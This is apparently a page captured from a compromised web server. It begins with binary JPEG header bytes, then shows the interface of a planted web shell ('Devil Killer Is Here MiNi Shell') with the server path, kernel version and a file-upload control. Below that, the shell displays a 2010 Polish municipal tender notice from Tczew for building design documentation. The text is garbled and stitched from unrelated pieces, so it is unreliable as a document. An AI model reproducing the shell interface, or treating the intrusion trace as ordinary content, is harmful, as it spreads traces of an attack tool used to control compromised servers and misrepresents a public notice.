JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100831/271476-N-2010.html

<p class="kh_header"><b>Tczew: Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiaru robót oraz kosztorysu inwestorskiego dla:
Zadania nr 1 - Przebudowa budynku przy ul. Zamkowej 26 w Tczewie,
Zadania nr 2 - Przebudowa budynku przy ul. Mickiewicza 18 w Tczewie.</b><br>
<b>Numer ogłoszenia: 271476 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Tczew , Plac Piłsudskiego 1, 83-110 Tczew, woj. pomorskie, tel. 0-58 7759343, faks 058 7759355.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiaru robót oraz kosztorysu inwestorskiego dla:
Zadania nr 1 - Przebudowa budynku przy ul. Zamkowej 26 w Tczewie,
Zadania nr 2 - Przebudowa budynku przy ul. Mickiewicza 18 w Tczewie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia dla zadania nr 1 

Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej przebudowy budynku przy ul. Zamkowa 26 w Tczewie (działka nr 325 obr. nr 8) w celu adaptacji dotychczasowych pomieszczeń mieszkalnych na lokal użytkowy przeznaczony na pomieszczenia świetlicy socjoterapeutycznej.

Wielobranżowy projekt budowlany i wykonawczy należy wykonać na podstawie/zgodnie z:
- przepisami ustawy Prawo budowlane z dnia 07 lipca 1994 ( Dz.U. 2006 nr 156 poz. 1118 z późniejszymi zmianami) oraz przepisami ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 (t.j. Dz. U. z 2010r. Nr 113, poz.759),
- wypisu z Miejscowego Planu Zagospodarowania Przestrzennego,
- mapy do celów projektowych pozyskanych przez wykonawcę na jego koszt w zakresie niezbędnym do wykonania projektu budowlanego,
- warunków technicznych przyłączenia i dostawy mediów pozyskanych przez Wykonawcę,
- obowiązujących norm i przepisów,
- uzyskanych przez Wykonawcę (również na podstawie pełnomocnictw i upoważnień udzielonych przez zamawiającego) wymaganych opinii, uzgodnień, pozwoleń i sprawdzeń,
- uzyskanych przez Wykonawcę w zależności od potrzeb wyników badań geologiczno-inżynierskich oraz geotechnicznych warunków posadowienia obiektów budowlanych,
- zaleceń Miejskiego Konserwatora Zabytków odnośnie przebudowy budynku w ramach projektu Rewitalizacji obszaru zdegradowanego.

Planowana funkcja użytkowa budynku

Przewiduje się zagospodarowanie pomieszczeń budynku na lokal użytkowy przeznaczony na działalność świetlicy socjoterapeutycznej dla dzieci. W związku z tym należy złożyć wniosek o zmianę sposobu użytkowania obiektu budowlanego.     
W świetlicy należy  wydzielić  następujące pomieszczenia: pokoje, kuchnię i łazienkę.

Przedmiot  zamówienia polega na:

a) opracowaniu dokumentacji projektowej:
- projekt budowlany,
- projekt wykonawczy,
- przedmiar robót,
- informacja dotycząca bezpieczeństwa i ochrony zdrowia,
- opracowanie  orzeczenia techniczno- konstrukcyjnego niezbędne do prawidłowego wykonania dokumentacji projektowej,
- wykonanie inwentaryzacji stanu istniejącego,
b) opracowaniu specyfikacji technicznych wykonania i odbioru robót budowlanych,
c) opracowaniu kosztorysów inwestorskich z wyszczególnieniem procentowym udziałem realizacji elementów robót w stosunku do wartości ogółem przedmiotu zamówienia, co będzie niezbędne przy opracowaniu harmonogramu płatności dla wykonawcy zadania, 
d) opracowaniu zbiorczego zestawienia kosztów,
e) pełnieniu nadzoru autorskiego.

Wszystkie opracowania należy wykonać na nośniku elektronicznym w formacie pdf bez kosztorysu oraz na papierze w 9 egzemplarzach za wyjątkiem pozycji c i d, które należy wykonać na papierze w 2 egzemplarzach.

Przedmiot zamówienia obejmuje również przekazanie praw autorskich w  zakresie niniejszej dokumentacji projektowej, w tym praw autorskich zależnych.

Szczegółowy zakres opracowań wchodzących w skład dokumentacji projektowej:

- projekt budowlany i wykonawczy w branży ogólnobudowlanej i  konstrukcyjnej,
- projekt budowlany i wykonawczy w branży sanitarnej: instalacje wod.- kan., kanalizacja deszczowa, instalacja gazowa,  CO    z zainstalowanym kotłem na paliwo gazowe 
- projekt budowlany i wykonawczy w branży elektrycznej (teletechnicznej) komputerowe   telefonii oraz systemu sygnalizacji włamania i pożaru,  	
- projekt budowlany i wykonawczy instalacji elektrycznej - wewnętrzne linie zasilające, instalację gniazd wtykowych, instalację oświetleniową, ochronę przepięciową i ochronę od porażeń, rozdzielnicę główną.

Projekty winny posiadać wszystkie niezbędne uzgodnienia zapewniające uzyskanie pozwolenia  na budowę.
Sporządzić plan BIOZ.
Projektant wystąpi i uzyska decyzje środowiskowe.
Projektant wykona i przedstawi do uzgodnienia Zamawiającemu koncepcję projektowo architektoniczną adaptacji pomieszczeń budynku. 
Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013; projekt pn. Rewitalizacja strefy A obszaru zdegradowanego Starego Miasta w Tczewie

2. Opis przedmiotu zamówienia dla zadania nr 2

Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej przebudowy budynku przy ul. Mickiewicza 18 w Tczewie (działka nr 148 obr. nr 8), której celem jest poprawienie obecnego stanu technicznego obiektu zachowując istniejącą w budynku funkcję mieszkalną i usługową.

Wielobranżowy projekt budowlany i wykonawczy należy wykonać na podstawie /zgodnie z:
- przepisami ustawy Prawo budowlane z dnia 07 lipca 1994 ( Dz.U. 2006 nr 156 poz.1118 z późniejszymi zmianami) oraz przepisami ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 (t.j. Dz. U. z 2010r. Nr 113, poz.759),
- wypisu z Miejscowego Planu Zagospodarowania Przestrzennego,
- mapy do celów projektowych pozyskanych przez wykonawcę na jego koszt zakresie niezbędnym do wykonania projektu budowlanego,
- warunków technicznych przyłączenia i dostawy mediów pozyskanych przez wykonawcę
- obowiązujących norm i przepisów,	
- uzyskanych przez wykonawcę (również na podstawie pełnomocnictw i upoważnień udzielonych przez zamawiającego) wymaganych opinii, uzgodnień, pozwoleń i sprawdzeń, 
- uzyskanych przez wykonawcę w zależności od potrzeb wyników badań geologiczno - inżynierskich oraz geotechnicznych warunków posadowienia obiektów budowlanych,
- zaleceń Miejskiego Konserwatora Zabytków odnośnie przebudowy budynku w ramach projektu Rewitalizacji obszaru zdegradowanego.

Planowana funkcja użytkowa budynku

Planowane jest pozostawienie istniejących aktualnie w obiekcie funkcji mieszkalnej i usługowej.

Przedmiot zamówienia polega na:
a) opracowaniu dokumentacji projektowej: 
- projekt budowlany,
- projekt wykonawczy,
- przedmiar robót,
- informacja dotycząca bezpieczeństwa i ochrony zdrowia,
- wykonanie orzeczenia  techniczno-konstrukcyjnego niezbędnego do prawidłowego wykonania dokumentacji projektowej,
- wykonanie inwentaryzacji stanu istniejącego,
b) opracowaniu specyfikacji technicznych wykonania i odbioru robót budowlanych,
c) opracowaniu kosztorysów inwestorskich z wyszczególnieniem procentowym udziałem realizacji elementów robót w stosunku do wartości ogółem przedmiotu zamówienia, co będzie niezbędne przy opracowaniu harmonogramu płatności dla wykonawcy zadania, 
d) opracowaniu zbiorczego zestawienia kosztów,
e) pełnieniu nadzoru autorskiego.

Wszystkie opracowania należy wykonać na nośniku elektronicznym w formacie pdf  bez kosztorysu oraz na papierze w 9 egzemplarzach za wyjątkiem pozycji c i d, które należy wykonać na papierze w 2 egzemplarzach.
Przedmiot zamówienia obejmuje również przekazanie praw autorskich w zakresie niniejszej dokumentacji projektowej, w tym praw autorskich zależnych.
Szczegółowy zakres opracowań wchodzących w skład dokumentacji projektowej:
- projekt budowlany i wykonawczy w branży ogólnobudowlanej i  konstrukcyjnej,
- projekt budowlany i wykonawczy w branży sanitarnej: instalacje wod.- kan., kanalizacja deszczowa, instalacja gazowa, CO  z zainstalowanym kotłem na paliwo olejowe  z możliwością zainstalowania alternatywnego kotła na paliwo gazowe,
- projekt budowlany i wykonawczy w branży elektrycznej (teletechnicznej) komputerowej i  telefonii oraz systemu sygnalizacji włamania i pożaru, 
- projekt budowlany i wykonawczy instalacji elektrycznej - wewnętrzne linie zasilające, instalację gniazd wtykowych, instalację oświetleniową, ochronę przepięciową i ochronę od porażeń, rozdzielnicę główną.

Projekty winny posiadać wszystkie niezbędne uzgodnienia zapewniające uzyskanie pozwolenia  na budowę.
Sporządzić plan BIOZ.
Projektant wystąpi i uzyska decyzje środowiskowe.
Projektant wykona i przedstawi do uzgodnienia Zamawiającemu koncepcję projektowo -architektoniczną remontu pomieszczeń budynków.

Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013; projekt pn. Rewitalizacja strefy A obszaru zdegradowanego Starego Miasta w Tczewie

3. Ponadto dla zadania nr 1 i zadania nr 2:

Wykonawca niezwłocznie udzieli pisemnych wyjaśnień dotyczących wykonanej dokumentacji objętej przedmiotem umowy w trakcie przygotowywania i przeprowadzania procedury postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych na podstawie dokumentacji objętej przedmiotem umowy.

Wykonawca przekaże prawa autorskie w zakresie dokumentacji projektowej, o której mowa w ust. 1 oraz ust. 2  § 1 Umowy, w tym praw autorskich zależnych oraz będzie pełnił nadzór autorski podczas realizacji inwestycji na podstawie niniejszej dokumentacji projektowej, tj.: stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem, uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej - w terminie od dnia odebrania dokumentacji projektowej do dnia 31.12.2014r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.40.00-0, 71.24.50.00-7, 71.24.60.00-4, 71.24.70.00-1, 71.24.80.00-8, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; jednakże Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i doświadczenie, a w szczególności, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a) dla zadania nr 1 - 2 dokumentacje projektowe budowy i/lub przebudowy i/lub remontu i/lub modernizacji i/lub adaptacji budynku, obejmujące m.in. projekt budowlany i projekt wykonawczy (projekt budowlano-wykonawczy), o wartości łącznie z podatkiem VAT, nie mniejszej niż 40.000,00 zł (słownie: czterdzieści tysięcy złotych 00/100) każda,  
b) dla zadania nr 2 - 2 dokumentacje projektowe budowy i/lub przebudowy i/lub remontu i/lub modernizacji i/lub adaptacji budynku, obejmujące m.in. projekt budowlany i projekt wykonawczy (projekt budowlano-wykonawczy), o wartości łącznie z podatkiem VAT, nie mniejszej niż 80.000,00 zł (słownie: osiemdziesiąt tysięcy złotych 00/100) każda. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia. Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dla zadania nr 1 i/lub zadania nr 2: a) dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej;
b) dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej    w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,  
c) dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej     w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że znajduje się w sytuacji ekonomicznej i finansowej, a w szczególności że jego przychody netto za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, wynosiły nie mniej niż:
a) dla zadania nr 1 - 150.000,00 zł (słownie: sto pięćdziesiąt  tysięcy złotych 00/100),
b) dla zadania nr 2 - 300.000,00 zł (słownie: trzysta  tysięcy złotych 00/100);

W przypadku, gdy Wykonawca składa ofertę na dwa zadania, w odniesieniu do warunku sytuacji finansowej i ekonomicznej Wykonawca, musi udokumentować, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności, że jego przychody netto za ostatni rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, wynosiły nie mniej niż: 450.000,00 zł. Ocena spełnienia powyższego warunku wymaganego od Wykonawców zostanie dokonana na podstawie złożonej oferty wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt III.4.3.1) niniejszego ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 3. W przypadku zatrudnienia Podwykonawców, Wykonawca załączy do oferty informację wg Formularza nr 6 SIWZ dotyczącą Podwykonawców. 4. Wykonawca załączy do oferty pełnomocnictwo, czyli dokument stwierdzający ustanowienie pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia, albo reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy , o ile sposób reprezentacji nie wynika z innych dokumentów, np. z odpisu z właściwego rejestru. Wykonawcy będący osobami fizycznymi winni załączyć do oferty aktualnego (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) zaświadczenia o wpisie do ewidencji działalności gospodarczej. 5. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych, natomiast warunki określone w pkt III.3) niniejszego ogłoszenia muszą spełniać łącznie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Skrócenie terminu wykonania dokumentacji - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany ustaleń umowy w stosunku do treści oferty Wykonawcy. Zmiany przewidziane w Umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany mogą dotyczy zmiany wynagrodzenia brutto w przypadku ustawowej zmiany stawki podatku VAT.Zmiany mogą zostać dokonane, jeżeli zachodzą i są ich uzasadnieniem zmiany obowiązujących przepisów</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.tczew.pl<br>
